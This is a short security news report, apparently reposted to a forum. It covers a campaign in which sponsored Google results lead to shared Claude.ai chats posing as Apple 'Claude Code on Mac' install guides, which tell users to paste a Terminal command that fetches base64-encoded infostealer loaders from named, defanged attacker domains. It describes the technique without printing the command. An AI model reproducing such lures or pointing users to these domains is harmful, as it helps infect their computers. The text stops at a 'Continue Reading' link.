Hackers Abuse Google Ads and Claude.ai Shared Chats to Distribute macOS Malware

[harlan4096]

Attackers are currently running a malvertising campaign that uses Google Ads and legitimate shared chats on Claude.ai to spread macOS infostealer malware. The campaign was identified by Berk Albayrak, a security engineer at Trendyol Group, with BleepingComputer independently confirming a second active version using different infrastructure.

Users searching for "Claude mac download" might see sponsored Google search results directing them to Claude.ai, with the URL appearing legitimate. These links lead to publicly shared Claude chats that appear as official "Claude Code on Mac" installation guides supposedly from Apple Support. The chats instruct users to open Terminal and paste a command, which then silently downloads and executes malware.

At the time of reporting, two separate Claude shared chats involved in this attack were accessible publicly, each using different domains and payloads but sharing an identical social engineering approach.

How the Claude.ai Malvertising Attack Works

The command being pasted downloads a shell script that is encoded in base64 from domains controlled by attackers. One version, flagged by BleepingComputer, fetches a script called loader.sh from bernasibutuwqu2[.]com, while another, identified by Albayrak, uses customroofingcontractors[.]com.

This loader runs entirely in memory, which means it leaves minimal traces on the disk. The server delivers a uniquely obfuscated version of the payload for each request, a technique known as polymorphic delivery. This approach makes signature-based detection much more difficult.

Continue Reading...